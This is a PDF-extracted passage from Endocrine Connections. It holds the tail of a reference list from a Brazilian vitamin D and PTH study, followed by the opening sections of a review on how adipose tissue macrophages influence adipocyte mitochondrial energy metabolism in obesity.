vitamin D from the Institute of Medicine: what clinicians need to know. Journal of Clinical Endocrinology and Metabolism 2011 96 53–58. (https://doi. org/10.1210/jc.2010-2704). 21 Unger MD. Determinação dos níveis séricos de vitamina D em uma amostra de indivíduos saudáveis da população brasileira. São Paulo. Doctoral Dissertation (Science Doctorate), The Faculty of Medicine of the Univeristy of São Paulo, 2009. 22 Scalco R, Premaor MO, Fröehlich PE & Furlanetto TW. High prevalence of hypovitaminosis D and secondary hyperparathyroidism in elders living in nonprofit homes in South Brazil. Endocrine 2008 33 95–100. (https://doi.org/10.1007/s12020- 008-9061-2) 23 Linhares ER, Jones DA, Round JM & Edwards RHT. Effect of nutrition on vitamin D status: studies on healthy and poorly nourished Brazilian children. American Journal of Clinical Nutrition 1984 39 625–630. (https://doi.org/10.1093/ajcn/39.4.625) 24 Al-Ghamdi MA, Lanham-New SA & Kahn JA. Differences in vitamin D status and calcium metabolism in Saudi Arabian boys and girls aged 6 to 18 years: effects of age, gender, extent of veiling and physical activity with concomitant implications for bone health. Public Health Nutrition 2012 15 1845–1853. (https://doi.org/10.1017/ S1368980011003612) 25 Kiani RA, Asad MJ, Abbasi S, Farooq N & Khan MU. Prevalence of vitamin-D deficiency in urban population: a retrospective analysis. Annals of Pakistan Institute of Medical Sciences 2015 11 90–94. 26 Santos HO, Howell S, Nichols K & Teixeira FJ. Reviewing the evidence on vitamin D supplementation in the management of testosterone status and its effects on male reproductive system (testis and prostate): mechanistically dazzling but clinically disappointing. Clinical Therapeutics 2020 42 e101–e114. (https://doi.org/10.1016/j. clinthera.2020.03.016) 27 Pilz S, Frisch S, Koertke H, Kuhn J, Dreier J, Obermayer-Pietsch B, Wehr E & Zittermann A. Effect of vitamin D supplementation on testosterone levels in men. Hormone and Metabolic Research 2011 43 223–225. (https://doi.org/10.1055/s-0030-1269854) 28 Wehr E, Pilz S, Boehm BO, März W & Obermayer-Pietsch B. Association of vitamin D status with serum androgen levels in men. Clinical Endocrinology 2009 73 243–248. (https://doi.org/10.1111/ j.1365-2265.2009.03777.x) 29 Iyengar R, Maceda C, Beebe H, Crowley L, Woodward M, Bar- chama N & McLaughlin MA. MP51-04 association between testosterone, vitamin D and cardiovascular risk. Journal of Urology 2015 193 e621. (https://doi.org/10.1016/j.juro.2015.02.1741) 30 Santos Araújo EPD, Queiroz DJM, Neves JPR, Lacerda LM, Gonçalves MDCR & Carvalho AT. Prevalence of hypovitaminosis D and associated factors in adolescent students of a capital of Northeastern Brazil. Nutricion Hospitalaria 2017 34 1416–1423. (https://doi.org/10.20960/nh.1097) 31 Bell NH, Epstein S, Greene A, Shary J, Oexmann MJ & Shaw S. Evidence for alteration of the vitamin D-endocrine system in obese subjects. Journal of Clinical Investigation 1985 76 370–373. (https:// doi.org/10.1172/JCI111971) 32 Compston JE, Vedi S, Ledger JE, Webb A, Gazet JC & Pilkington TR. Vitamin D status and bone histomorphometry in gross obesity. American Journal of Clinical Nutrition 1981 34 2359–2363. (https:// doi.org/10.1093/ajcn/34.11.2359) 33 Eloi M, Horvath DV, Szejnfeld VL, Ortega JC, Rocha DAC, Szejnfeld J & Castro CHM. Vitamin D deficiency and seasonal variation over the years in São Paulo, Brazil. Osteoporosis International 2016 27 3449–3456. (https://doi.org/10.1007/s00198-016-3670-z) 34 Fang F, Wei H, Wang K, Tan L, Zhang W, Ding L, Liu T, Shan Z & Zhu M. High prevalence of vitamin D deficiency and influencing factors among urban and rural residents in Tianjin, China. Archives of Osteoporosis 2018 13 64. (https://doi.org/10.1007/s11657-018-0479-8) 35 Choi HS, Oh HJ, Choi H, Choi WH, Kim JG, Kim KM, Kim KJ, Rhee Y & Lim SK. Vitamin D insufficiency in Korea – a greater threat to younger generation: the Korea National Health and Nutrition Examination Survey (KNHANES) 2008. Journal of Clinical Endocrinology and Metabolism 2011 96 643–651. (https://doi. org/10.1210/jc.2010-2133) 36 Chen J, Yun C, He Y, Piao J, Yang L & Yang X. Vitamin D status among the elderly Chinese population: a cross-sectional analysis of the 2010–2013 China national nutrition and health survey (CNNHS). Nutrition Journal 2017 16 3. (https://doi.org/10.1186/s12937-016- 0224-3. 37 Nurbazlin M, Chee WSS, Rokiah P, Alexander AT, Chew YY, Nusaibah ARS & Chan SP. Effects of sun exposure on 25(OH) vitamin D concentration in urban and rural women in Malaysia. Asia Pacific Journal of Clinical Nutrition 2013 22 391–399. (https://doi. org/10.6133/apjcn.2013.22.3.15) 38 Heere C, Skeaff CM, Waqatakirewa L, Vatucawaqa P, Khan AN & Green TJ. Serum 25-hydroxyvitamin D concentration of Indigenous- Fijian and Fijian-Indian women. Asia Pacific Journal of Clinical Nutrition 2010 19 43–48. 39 G R & Gupta A. Vitamin D deficiency in India: prevalence, causalities and interventions. Nutrients 2014 6 729–775. (https://doi. org/10.3390/nu6020729) 40 Kimlin MG, Lucas RM, Harrison SL, van der Mei I, Armstrong BK, Whiteman DC, Kricker A, Nowak M, Brodie AM & Sun J. The contributions of solar ultraviolet radiation exposure and other This work is licensed under a Creative Commons Attribution-NonCommercial 4.0 International License.https://doi.org/10.1530/EC-20-0206 https://ec.bioscientifica.com © 2020 The authors Published by Bioscientifica Ltd Downloaded from Bioscientifica.com at 04/06/2021 04:58:15PM via free access https://neo.sci.gsfc.nasa.gov/view.php?datasetId=AURA_UVI_CLIM_M https://neo.sci.gsfc.nasa.gov/view.php?datasetId=AURA_UVI_CLIM_M https://www.who.int/news-room/q-a-detail/ultraviolet-(uv)-index https://www.who.int/news-room/q-a-detail/ultraviolet-(uv)-index http://www.inmet.gov.br/portal/index.php?r=bdmep/bdmep http://www.inmet.gov.br/portal/index.php?r=bdmep/bdmep http://satelite.cptec.inpe.br/radiacao/ http://satelite.cptec.inpe.br/radiacao/ https://doi.org/10.1007/s00704-004-0044-9 https://doi.org/10.1007/s00704-004-0044-9 https://doi.org/10.1029/2008GM000720 https://www.diasorin.com/en/node/8476 https://www.diasorin.com/en/node/8476 http://www.deqas.org/downloads/DEQAS%20Review%20October%202017.pdf http://www.deqas.org/downloads/DEQAS%20Review%20October%202017.pdf https://doi.org/10.1210/jc.2011-0385 https://doi.org/10.1210/jc.2011-0385 https://doi.org/10.1542/peds.2012-2590 https://doi.org/10.1542/peds.2012-2590 https://doi.org/10.1210/jc.2010-2704 https://doi.org/10.1210/jc.2010-2704 https://doi.org/10.1007/s12020-008-9061-2 https://doi.org/10.1007/s12020-008-9061-2 https://doi.org/10.1093/ajcn/39.4.625 https://doi.org/10.1017/S1368980011003612 https://doi.org/10.1017/S1368980011003612 https://doi.org/10.1016/j.clinthera.2020.03.016 https://doi.org/10.1016/j.clinthera.2020.03.016 https://doi.org/10.1055/s-0030-1269854 https://doi.org/10.1111/j.1365-2265.2009.03777.x https://doi.org/10.1111/j.1365-2265.2009.03777.x https://doi.org/10.1016/j.juro.2015.02.1741 https://doi.org/10.20960/nh.1097 https://doi.org/10.1172/JCI111971 https://doi.org/10.1172/JCI111971 https://doi.org/10.1093/ajcn/34.11.2359 https://doi.org/10.1093/ajcn/34.11.2359 https://doi.org/10.1007/s00198-016-3670-z https://doi.org/10.1007/s11657-018-0479-8 https://doi.org/10.1210/jc.2010-2133 https://doi.org/10.1210/jc.2010-2133 https://doi.org/10.1186/s12937-016-0224-3 https://doi.org/10.1186/s12937-016-0224-3 https://doi.org/10.6133/apjcn.2013.22.3.15 https://doi.org/10.6133/apjcn.2013.22.3.15 https://doi.org/10.3390/nu6020729 https://doi.org/10.3390/nu6020729 https://creativecommons.org/licenses/by-nc/4.0/ https://creativecommons.org/licenses/by-nc/4.0/ https://doi.org/10.1530/EC-20-0206 https://ec.bioscientifica.com N Neves Marques de Queiroz et al. Vitamin D and PTH: a cross-sectional study 6759:7 determinants to Serum 25-hydroxyvitamin D concentrations in Australian adults: the AusD study. American Journal of Epidemiology 2014 179 864–874. (https://doi.org/10.1093/aje/kwt446) 41 Ling Y, Lin H, Aleteng Q, Ma H, Pan B, Gao J & Gao X. Cdx-2 polymorphism in vitamin D Receptor gene was associated with serum 25-hydroxyvitamin D levels, bone mineral density and fracture in middle-aged and elderly Chinese women. Molecular and Cellular Endocrinology 2016 427 155–161. (https://doi.org/10.1016/j. mce.2016.03.014) 42 Mezzavilla M, Tomei S, Alkayal F, Melhem M, Ali MM, Al-Arouj M, Bennakhi A, Alsmadi O & Elkum N. Investigation of genetic variation and lifestyle determinants in vitamin D levels in Arab individuals. Journal of Translational Medicine 2018 16 20. (https://doi.org/10.1186/ s12967-018-1396-8) 43 Uitterlinden AG, Fang Y, van Meurs JBJ, Pols HAP & van Leeuwen JPTM. Genetics and biology of vitamin D receptor polymorphisms. Gene 2004 338 143–156. (https://doi.org/10.1016/j.gene.2004.05.014) 44 Jiang X, Kiel DP & Kraft P. The genetics of vitamin D. Bone 2019 126 59–77. (https://doi.org/10.1016/j.bone.2018.10.006) 45 Nissen J, Rasmussen LB, Ravn-Haren G, Andersen EW, Hansen B, Andersen R, Mejborn H, Madsen KH & Vogel U. Common variants in CYP2R1 and GC genes predict vitamin D concentrations in healthy Danish children and adults. PLoS ONE 2014 9 e89907. (https://doi. org/10.1371/journal.pone.0089907) 46 Husain NE, Badie Suliman AA, Abdelrahman I, Bedri SA, Musa RM, Osman HE, Mustafa AH, Gafer N, Farah E, Satir AA, et al. Vitamin D level and its determinants among Sudanese women: does it matter in a sunshine African country? Journal of Family Medicine and Primary Care 2019 8 2389–2394. (https://doi.org/10.4103/jfmpc. jfmpc_247_19) 47 Dirks NF, Ackermans MT, Lips P, de Jongh RT, Vervloet MG, de Jonge R & Heijboer AC. The when, what and how of measuring vitamin D metabolism in clinical medicine. Nutrients 2018 10 482. (https://doi.org/10.3390/nu10040482. 48 Ferreira CE. Consensus – reference ranges of vitamin D [25(OH)D] from the Brazilian medical societies. Brazilian Society of Clinical Pathology/Laboratory Medicine (SBPC/ML) and Brazilian Society of Endocrinology and Metabolism (SBEM). Jornal Brasileiro de Patologia e Medicina Laboratorial 2017 53 377–381. 49 Filgueiras MS, Suhett LG, Silva MA, Rocha NP & de Novaes JF. Lower vitamin D intake is associated with low HDL cholesterol and vitamin D insufficiency/deficiency in Brazilian children. Public Health Nutrition 2018 21 2004–2012. (https://doi.org/10.1017/ S1368980018000204) 50 Peters BSE, dos Santos LC, Fisberg M, Wood RJ & Martini LA. Prevalence of vitamin D insufficiency in Brazilian adolescents. Annals of Nutrition and Metabolism 2009 54 15–21. (https://doi. org/10.1159/000199454) 51 Cembranel F, Hallal ALC, González-Chica DA & d’Orsi E. Relação entre consumo alimentar de vitaminas e minerais, índice de massa corporal e circunferência da cintura: um estudo de base populacional com adultos no Sul do Brasil. Cadernos de Saúde Pública 2017 33 e00136616. (https://doi.org/10.1590/0102-311X00136616) 52 Fisberg RM, Marchioni DML, de Castro MA, Verly Junior E, Araújo MC, Bezerra IN, Pereira RA & Sichieri R. Ingestão inadequada de nutrientes na população de idosos do Brasil: inquérito Nacional de Alimentação 2008–2009. Revista de Saúde Pública 2013 47 (Supplement 1) 222s–230s. (https://doi.org/10.1590/S0034- 89102013000200008) 53 Libon F, Cavalier E & Nikkels AF. Skin color is relevant to vitamin D synthesis. Dermatology 2013 227 250–254. (https://doi. org/10.1159/000354750) 54 Xiang F, Lucas R, de Gruijl F & Norval M. A systematic review of the influence of skin pigmentation on changes in the concentrations of vitamin D and 25-hydroxyvitamin D in plasma/serum following experimental UV irradiation. Photochemical and Photobiological Sciences 2015 14 2138–2146. (https://doi.org/10.1039/ C5PP00168D) 55 Brazilian Institute of Geography and Statistics. Table 2094 – Resident population by color or race and religion. Rio de Janeiro, Brazil: IBGE. (available at: https://sidra.ibge.gov.br/tabela/2094#/n1/all/n2/all/ n3/all/v/1000093/p/last%201/c86/allxt/c133/0/d/v1000093%20 1/l/v,p+c86,t+c133/resultado) 56 Munns CF, Shaw N, Kiely M, Specker BL, Thacher TD, Ozono K, Michigami T, Tiosano D, Mughal MZ, Mäkitie O, et al. Global consensus recommendations on prevention and management of nutritional rickets. Journal of Clinical Endocrinology and Metabolism 2016 101 394–415. (https://doi.org/10.1210/jc.2015-2175) Received in final form 2 June 2020 Accepted 18 June 2020 Accepted Manuscript published online 19 June 2020 This work is licensed under a Creative Commons Attribution-NonCommercial 4.0 International License.https://doi.org/10.1530/EC-20-0206 https://ec.bioscientifica.com © 2020 The authors Published by Bioscientifica Ltd Downloaded from Bioscientifica.com at 04/06/2021 04:58:15PM via free access https://doi.org/10.1093/aje/kwt446 https://doi.org/10.1016/j.mce.2016.03.014 https://doi.org/10.1016/j.mce.2016.03.014 https://doi.org/10.1186/s12967-018-1396-8 https://doi.org/10.1186/s12967-018-1396-8 https://doi.org/10.1016/j.gene.2004.05.014 https://doi.org/10.1016/j.bone.2018.10.006 https://doi.org/10.1371/journal.pone.0089907 https://doi.org/10.1371/journal.pone.0089907 https://doi.org/10.4103/jfmpc.jfmpc_247_19 https://doi.org/10.4103/jfmpc.jfmpc_247_19 https://doi.org/10.3390/nu10040482 https://doi.org/10.1017/S1368980018000204 https://doi.org/10.1017/S1368980018000204 https://doi.org/10.1159/000199454 https://doi.org/10.1159/000199454 https://doi.org/10.1590/0102-311X00136616 https://doi.org/10.1590/S0034-89102013000200008 https://doi.org/10.1590/S0034-89102013000200008 https://doi.org/10.1159/000354750 https://doi.org/10.1159/000354750 https://doi.org/10.1039/C5PP00168D https://doi.org/10.1039/C5PP00168D https://sidra.ibge.gov.br/tabela/2094#/n1/all/n2/all/n3/all/v/1000093/p/last%201/c86/allxt/c133/0/d/v1000093%201/l/v,p+c86,t+c133/resultado https://sidra.ibge.gov.br/tabela/2094#/n1/all/n2/all/n3/all/v/1000093/p/last%201/c86/allxt/c133/0/d/v1000093%201/l/v,p+c86,t+c133/resultado https://sidra.ibge.gov.br/tabela/2094#/n1/all/n2/all/n3/all/v/1000093/p/last%201/c86/allxt/c133/0/d/v1000093%201/l/v,p+c86,t+c133/resultado https://doi.org/10.1210/jc.2015-2175 https://creativecommons.org/licenses/by-nc/4.0/ https://creativecommons.org/licenses/by-nc/4.0/ https://doi.org/10.1530/EC-20-0206 https://ec.bioscientifica.com Abstract Introduction Method Study design and data collection Assay Statistical analysis Results Discussion Conclusion Declaration of interest Funding Ethics approval and consent to participate Consent for publication Availability of data and material Author contribution statement Acknowledgements References work_lbym4kns2nhrrcgrs5qrckanai ---- 8:6 R105–R121M Keuper Inflammatory control of adipocyte bioenergetics REVIEW On the role of macrophages in the control of adipocyte energy metabolism Michaela Keuper Department of Molecular Biosciences, The Wenner-Gren Institute, Stockholm University, Stockholm, Sweden Correspondence should be addressed to M Keuper: michaela.keuper@su.se Abstract The crosstalk between macrophages (MΦ) and adipocytes within white adipose tissue (WAT) influences obesity-associated insulin resistance and other associated metabolic disorders, such as atherosclerosis, hypertension and type 2 diabetes. MΦ infiltration is increased in WAT during obesity, which is linked to decreased mitochondrial content and activity. The mechanistic interplay between MΦ and mitochondrial function of adipocytes is under intense investigation, as MΦ and inflammatory pathways exhibit a pivotal role in the reprogramming of WAT metabolism in physiological responses during cold, fasting and exercise. Thus, the underlying immunometabolic pathways may offer therapeutic targets to correct obesity and metabolic disease. Here, I review the current knowledge on the quantity and the quality of human adipose tissue macrophages (ATMΦ) and their impact on the bioenergetics of human adipocytes. The effects of ATMΦ and their secreted factors on mitochondrial function of white adipocytes are discussed, including recent research on MΦ as part of an immune signaling cascade involved in the ‘browning’ of WAT, which is defined as the conversion from white, energy-storing adipocytes into brown, energy- dissipating adipocytes. Introduction White adipose tissue (WAT) is a metabolically active tissue that modifies systemic metabolism significantly by regulating the storage and release of lipids. Free fatty acids serve as a major fuel source during times of energy scarcity and high energy demands, such as exercise, cold exposure and immune responses. The dysregulation of fatty acid release contributes to dyslipidemia, resulting in ectopic fat deposition into various organs. Ectopic fat in turn impairs organ functionality, as seen during many metabolic diseases. Importantly, WAT also releases metabolites other than fatty acids (e.g. lactate as glycolytic end-product) (1). Beyond the direct metabolic effects, WAT also mediates endocrine crosstalk by secretion of various adipokines (e.g. adiponectin and leptin) (2, 3). The crucial role of mitochondrial activity for WAT function is well established and impacts the capacity of lipid storage (4, 5) and secretory function (6, 7, 8). Clinical studies substantiate the strong association between decreased mitochondrial content and oxygen consumption of WAT/adipocytes, which is in particular evident during metabolic complications such as insulin resistance, type 2 diabetes (T2DM) and cardiovascular diseases (9, 10, 11, 12, 13). A crucial hallmark in the development of obesity-associated metabolic disorders is the chronic, low-grade inflammation of WAT (14, 15). Although obesity-associated inflammation and macrophage (MΦ) infiltration affect many tissues (such as liver, muscle, brain and pancreas (16, 17, 18, 19, 20)), the infiltration into WAT is disproportionately increased. Notably, it has been suggested that the obesity-associated inflammation of human WAT compromises mitochondrial function (21, 22, 23, 24). Adipose tissue macrophages (ATMΦ) also reside in the WAT of lean and healthy individuals, suggesting a -19-0016 Key Words f inflammation f oxidative phosphorylation f glycolysis f cellular energy metabolism f obesity f diabetes Endocrine Connections (2019) 8, R105–R121 ID: 19-0016 8 6 This work is licensed under a Creative Commons Attribution-NonCommercial-NoDerivatives 4.0 International License. https://doi.org/10.1530/EC-19-0016 https://ec.bioscientifica.com © 2019 The authors Published by Bioscientifica Ltd Downloaded from Bioscientifica.com at 04/06/2021 04:58:28PM via free access mailto:michaela.keuper@su.se https://creativecommons.org/licenses/by-nc-nd/4.0/ https://creativecommons.org/licenses/by-nc-nd/4.0/ https://creativecommons.org/licenses/by-nc-nd/4.0/ https://doi.org/10.1530/EC-19-0016 https://ec.bioscientifica.com M Keuper Inflammatory control of adipocyte bioenergetics R106 PB–R17 8:6 fundamental physiological role for ATMΦ, beyond the context of pathology (Fig. 1). Some inflammatory processes appear to be important for healthy WAT expansion (25). The ATMΦ-secreted cytokines and chemokines act in an autocrine and paracrine manner, the latter by controlling the inflammatory response of other immune cells or possibly impacting the metabolism of adjacent adipocytes. Recent mouse studies suggest the secretion of ATMΦ factors that metabolically enhance adipocytes during cold, stress and exercise (26, 27, 28), which has been broadly termed the ‘browning’ of WAT. Some mechanistic aspects of MΦ-induced browning have been questioned (29, 30), but most studies collectively support a role for MΦ in the energy metabolism of adipocytes, in particular controlling adipocyte mitochondrial function (26, 27, 31, 32, 33, 34). Taken together, there is accumulating evidence that ATMΦ enhances or suppresses the mitochondrial function in WAT. The understanding of how adipocyte energy metabolism and mitochondria are regulated during physiological and pathophysiological adaptation requires the mechanistic understanding of the immunometabolic interaction between ATMΦ and adipocytes. The molecular networks of this interaction may offer potential interference points to correct imbalanced metabolism during pathological situations such as obesity and T2DM. Adipose tissue macrophages (ATMΦ) MΦ number increases in human white adipose tissue during obesity ATMΦ are numerically the dominant type of immune cells in human WAT, and obesity further enhances MΦ numbers in WAT, which contributes to obesity-related immune imbalances (Fig. 1A). However, the data on the Figure 1 Obesity-associated impaired immune balance in white adipose tissue. (A) Obesity is associated with an impaired immune balance toward pro- inflammatory in WAT. All fat depots are affected, but mostly the viscWAT. (B) ATMΦ amount is low in lean scWAT (~13% of SVF). However, MΦ are numerically the dominant type of immune cells representing half of the immune cells. MΦ increase in obese WAT, for example in human scWAT from 13 to 20% of the SVF (36). (C) The roles of ATMΦ in lean (left) and obese (right) WAT. The number of MΦ is low and they are interspersed between adipocytes in WAT of lean subjects, contrasting the higher number and local accumulation of MΦ in crown-like structures during obesity, which is fostered by proliferation, high immigration and low emigration. The low inflammatory profile (surface markers, cytokine expression and secretion, e.g. IL4, IL10) in lean subjects transforms into higher inflammatory status (e.g. TNFα, IL6, IL1β) during obesity. This work is licensed under a Creative Commons Attribution-NonCommercial-NoDerivatives 4.0 International License. https://doi.org/10.1530/EC-19-0016 https://ec.bioscientifica.com © 2019 The authors Published by Bioscientifica Ltd Downloaded from Bioscientifica.com at 04/06/2021 04:58:28PM via free access https://creativecommons.org/licenses/by-nc-nd/4.0/ https://creativecommons.org/licenses/by-nc-nd/4.0/ https://creativecommons.org/licenses/by-nc-nd/4.0/ https://doi.org/10.1530/EC-19-0016 https://ec.bioscientifica.com M Keuper Inflammatory control of adipocyte bioenergetics R1078:6 cellular composition of WAT (and thus the amount of ATMΦ) vary quantitatively between studies, depending on donor, fat depot, WAT isolation/processing method and molecular readout. The relative amount of MΦ varies from as little as ≤1% (CD11c+ cells, immunohistochemistry) in lean human scWAT (35), to up to 40% in obese scWAT, as seen in the first report from Weisberg et al. (CD68+ cells, immunohistochemistry) (24). The recent publication from Ehrlund et al. found that the stromal vascular fraction (SVF) of scWAT from lean donors consists of ~60% progenitors including preadipocytes, ~3% endothelial cells, ~25% immune cells (and an undetermined rest) (36) (Fig. 1B). Half of this immune cell population is represented by MΦ (CD45+/CD14+ cells), whereas the other half is represented by T cells, B cells, mast cells, neutrophils and eosinophils. This study also reports that MΦ content significantly increases during obesity to ~20% of SVF in scWAT (36). The identified numbers of ~13% MΦ in lean scWAT and ~20% in obese scWAT (Fig. 1B) agree well with other reports (35, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46). Several publications show increased MΦ numbers in WAT during obesity that are more pronounced in viscWAT than in scWAT (47, 48, 49). The ATMΦ numbers in both viscWAT and scWAT correlate with BMI (24, 40, 50). Although ATMΦ increase significantly in viscWAT during obesity, a recent publication also notes that the relative contribution of MΦ to the SVF is much smaller in viscWAT (lean: 3%; obese: 7%) as compared to scWAT (51). Comparing immune cell populations in viscWAT from lean, middle-aged, male mice to cynomolgus macaques and healthy humans revealed that MΦ are the dominant immune cell type in murine viscWAT, whereas in humans and cynomolgus macaques, T cells dominate, followed by MΦ as the second largest immune cell population (52). Considering these cross-species comparisons, MΦ may not always be the most abundant immune cell type in adipose tissue. Nevertheless, MΦ are present in scWAT and viscWAT with increasing numbers during obesity. Furthermore, the obese condition alters their quality, comprising the mode of activation and the diversity of the secretome. The local accumulation of ATMΦ in obese WAT Excessive energy intake (overnutrition) is broadly accepted as an inducer of increased ATMΦ infiltration in obese WAT, causing adipocyte hypertrophy and hypoxia, eventually leading to adipocyte dysfunction, cell death and fibrosis. This scenario is accompanied by higher levels of chemoattractant cytokines such as chemokine (C-C motif) ligand 2 (CCL2/MCP-1), chemokine (C-C motif) ligand 3 (CCL3/MIP1a) and others. These cytokines provide a chemotactic gradient that attracts monocytes into WAT (39, 53, 54, 55). Inside WAT, monocytes enhance the chemotactic gradient by secreting their own chemokines, thereby attracting additional MΦ and setting up a feed-forward inflammatory process. Between lean and obese, not only the number of MΦ changes, but also their localization: In lean WAT, ATMΦ are interstitially spaced, contrasting the local accumulation of ATMΦ in so-called ‘crown-like structures’ around dead, apoptotic adipocytes and/or fibrotic areas in obese WAT (35, 50, 56). Mouse studies indicate that the increased MΦ content in obese WAT presumably results from several processes: higher rates of recruited/infiltrating monocytes (e.g. via CCL2, see above) (57, 58, 59), proliferation of WAT- resident monocytes (60, 61) and lower emigration rates of ATMΦ out of obese WAT (e.g. via netrin 1) (62). The physiological importance of dynamic ATMΦ for WAT biology ATMΦ exert distinct physiological roles and beneficial effects on WAT homeostasis, for example, healthy lipid storage (25, 26, 63, 64, 65) (Fig. 1C). ATMΦ are dynamic cells and they quickly adapt their phenotype and metabolism to changing environments, for example during fasting- induced WAT lipolysis (65, 66) and overnutrition (67). ATMΦ stimulate healthy lipid storage and therefore prevent adverse ectopic lipid storage in other organs (e.g. hepatic steatosis). Anti- and pro-inflammatory signals seem to be involved in maintaining WAT homeostasis: Healthy WAT expansion is impaired by ablating tissue- resident ATMΦ (anti-inflammatory M2) (68) or reducing pro-inflammatory signals in murine WAT (25). Recently, ATMΦ function has been implicated in cold adaptation and exercise of mice (27, 28). IL4-activated MΦ appear to be part of an anti-inflammatory signaling cascade contributing to cold-induced browning and recruitment of beige adipocytes in scWAT (26, 27, 28, 63, 69, 70). The underlying molecular mechanisms, however, and some of the reported effects have been controversially discussed (29, 30). The potential role of ATMΦ in browning will be detailed in later sections. ATMΦ display a mixed phenotype in obese WAT One of the first studies investigating ATMΦ proposed a phenotypic switch during obesity: while resident M2-like ATMΦ dominate in lean WAT, pro-inflammatory (M1) This work is licensed under a Creative Commons Attribution-NonCommercial-NoDerivatives 4.0 International License. https://doi.org/10.1530/EC-19-0016 https://ec.bioscientifica.com © 2019 The authors Published by Bioscientifica Ltd Downloaded from Bioscientifica.com at 04/06/2021 04:58:28PM via free access https://creativecommons.org/licenses/by-nc-nd/4.0/ https://creativecommons.org/licenses/by-nc-nd/4.0/ https://creativecommons.org/licenses/by-nc-nd/4.0/ https://doi.org/10.1530/EC-19-0016 https://ec.bioscientifica.com M Keuper Inflammatory control of adipocyte bioenergetics R108 PB–R17 8:6 ATMΦ dominate in obese WAT (71). The stressed, obese WAT is marked by elevated levels of fatty acids and LPS, which can activate TLR4 signaling to polarize MΦ toward the pro-inflammatory M1 phenotype (72). Thus, ATMΦ can resemble the phenotype of LPS and IFNγ-activated MΦ during diet-induced obesity (15, 24, 37). This simplified classification of anti- (M2) vs pro- (M1) inflammatory activated MΦ, however, does not reflect the actual situation in vivo, where a spectrum of mixed markers is found (73). Notably, there are also species differences on the molecular level between human and murine ATMΦ. For example, the markers commonly used for murine MΦ polarization, such as inducible nitric oxide synthase (iNos) and arginase 1 (Arg1), are barely expressed in human ATMΦ (74, 75, 76, 77). Recently, several different ATMΦ subtypes have been identified in obese human WAT expressing macrophage activation markers of both the M1 spectrum (e.g. CD11c) and the M2 spectrum (e.g. CD163, CD206) (51, 78, 79, 80, 81). Additionally, human ATMΦ displaying M2 surface markers are capable of secreting both, pro- and anti-inflammatory cytokines (82). CD11c+-ATMΦ show a reduced pro-inflammatory profile after weight loss (79). Thus, in particular during obesity, ATMΦ cannot be classified using the simple dual M1/M2 model. A new category of MΦs, termed ‘metabolically’ activated MΦ, was recently proposed, which can be activated by the WAT-specific environment (hormones and nutrients) (83). Indeed, the WAT-specific microenvironment and/or the long retention time of MΦ in WAT during obesity may be the cause for the unique phenotype of ATMΦ. Data on monocytes/MΦ during obesity reveal higher immigration rates into obese WAT (59) and lower emigration rates (62), indicating longer exposure times for ATMΦ in the WAT microenvironment during obesity. Dissecting the different spatiotemporal phenotypes of human ATMΦ, including their secreted cytokines, chemokines and other factors, either during acute or chronic metabolic challenges (e.g. feeding/fasting, different diets, exercise, cold), is a challenging task. However, further insights on the role of ATMΦ in WAT metabolism and dysfunction would be gained from those studies, including the potential to distinguish and classify subgroups of obese patients with high risk for certain obesity-associated metabolic complications (e.g. NAFLD, cardiovascular complications). In summary, ATMΦ assist the maintenance of normal tissue function, such as adipokine secretion, healthy lipid storage and adaptation toward metabolic challenges (e.g. cold, exercise, fasting) (Fig. 1C). In obesity, the amount of ATMΦ increases through the combination of proliferation, immigration and retention. ATMΦ accumulate around dead adipocytes in crown-like structures and change their phenotype. Indeed, ATMΦ of the obese display altered secretion profiles, surface marker expression and metabolic function, thereby contributing to the overall (dys)function of WAT, which will eventually impact whole body metabolic homeostasis. The bioenergetics of human white fat cells Mitochondrial activity is important for lipid storage and secretory function of human white adipocytes Synthesis of ATP through oxidative phosphorylation (OXPHOS) is a major function of mitochondria to provide sufficient cellular energy. Therefore, energy-demanding adipose-specific functions, such as endocrine signaling and lipid storage, highly depend on adequate mitochondrial activity. Indirectly, mitochondria also control free fatty acid (FA) levels as the consequence of lipid storage control. Beyond ATP production, mitochondria also generate metabolic intermediates that are required for de novo lipogenesis. For example, the mitochondrial pyruvate dehydrogenase complex (PDH) decarboxylates pyruvate to acetyl-CoA, and thereby regulates glyceroneogenesis and the metabolic switch from glucose to lipid metabolism (4). A similar regulating role of mitochondria is found for the reverse process of lipolysis, the breakdown of lipids. Lipolysis and mitochondrial activity are closely linked as mitochondria facilitate lipolysis through FA oxidation. Furthermore, free FA can uncouple mitochondrial chain activity from ATP synthesis and enhance respiratory activity, while inhibitors of mitochondrial ATP production can abolish catecholamine-stimulated lipolysis (84, 85, 86). Mitochondria are also important players in the regulation of Ca2+ homeostasis (87), tying into the well- documented calcium-dependent processes in adipocytes during insulin-stimulated glucose uptake, leptin secretion and adipogenesis (88, 89, 90, 91, 92). Furthermore, adequate mitochondrial activity is required to execute the endocrine function of WAT (e.g. adiponectin secretion (6)). Finally, the basic processes of adipocyte differentiation and maturation are closely linked to the initiation of de novo mitochondrial biogenesis and reactive oxygen species (ROS) production (93, 94). Collectively, mitochondrial activity of adipocytes has an impact on all the essential and specialized functions of WAT, even those that control distantly the processes that maintain systemic homeostasis. This work is licensed under a Creative Commons Attribution-NonCommercial-NoDerivatives 4.0 International License. https://doi.org/10.1530/EC-19-0016 https://ec.bioscientifica.com © 2019 The authors Published by Bioscientifica Ltd Downloaded from Bioscientifica.com at 04/06/2021 04:58:28PM via free access https://creativecommons.org/licenses/by-nc-nd/4.0/ https://creativecommons.org/licenses/by-nc-nd/4.0/ https://creativecommons.org/licenses/by-nc-nd/4.0/ https://doi.org/10.1530/EC-19-0016 https://ec.bioscientifica.com M Keuper Inflammatory control of adipocyte bioenergetics R1098:6 The bioenergetic profile of (pre-)adipocytes and the regulation by nutrients and hormones As most proliferating progenitor cells, human subcutaneous preadipocytes depend mainly on glycolytic ATP production (~85% from glycolysis vs 15% from OXPHOS, Fig. 2) (95). During adipogenic differentiation, the mitochondrial content increases several fold (96) and the relative contribution of OXPHOS to total ATP production increases to 45–73% in human adipocytes (95, 97). Comparing mitochondrial oxygen consumption rates (OCRs) revealed four- to five-fold higher OCR in adipocytes as compared with preadipocytes (SGBS and primary cells) (95, 98). Of note, at least under in vitro conditions, glycolysis seems to be the preferred energy-producing pathway in both, preadipocytes and mature adipocytes. Adipocytes partially switch from OXPHOS to glycolysis in the presence of glucose. In the absence of glucose, however, only adipocytes, but not preadipocytes, are able to maintain their ATP demand by increasing mitochondrial activity. Therefore, mitochondria in human adipocytes allow for the high flexibility in substrate choice to maintain their energy metabolism 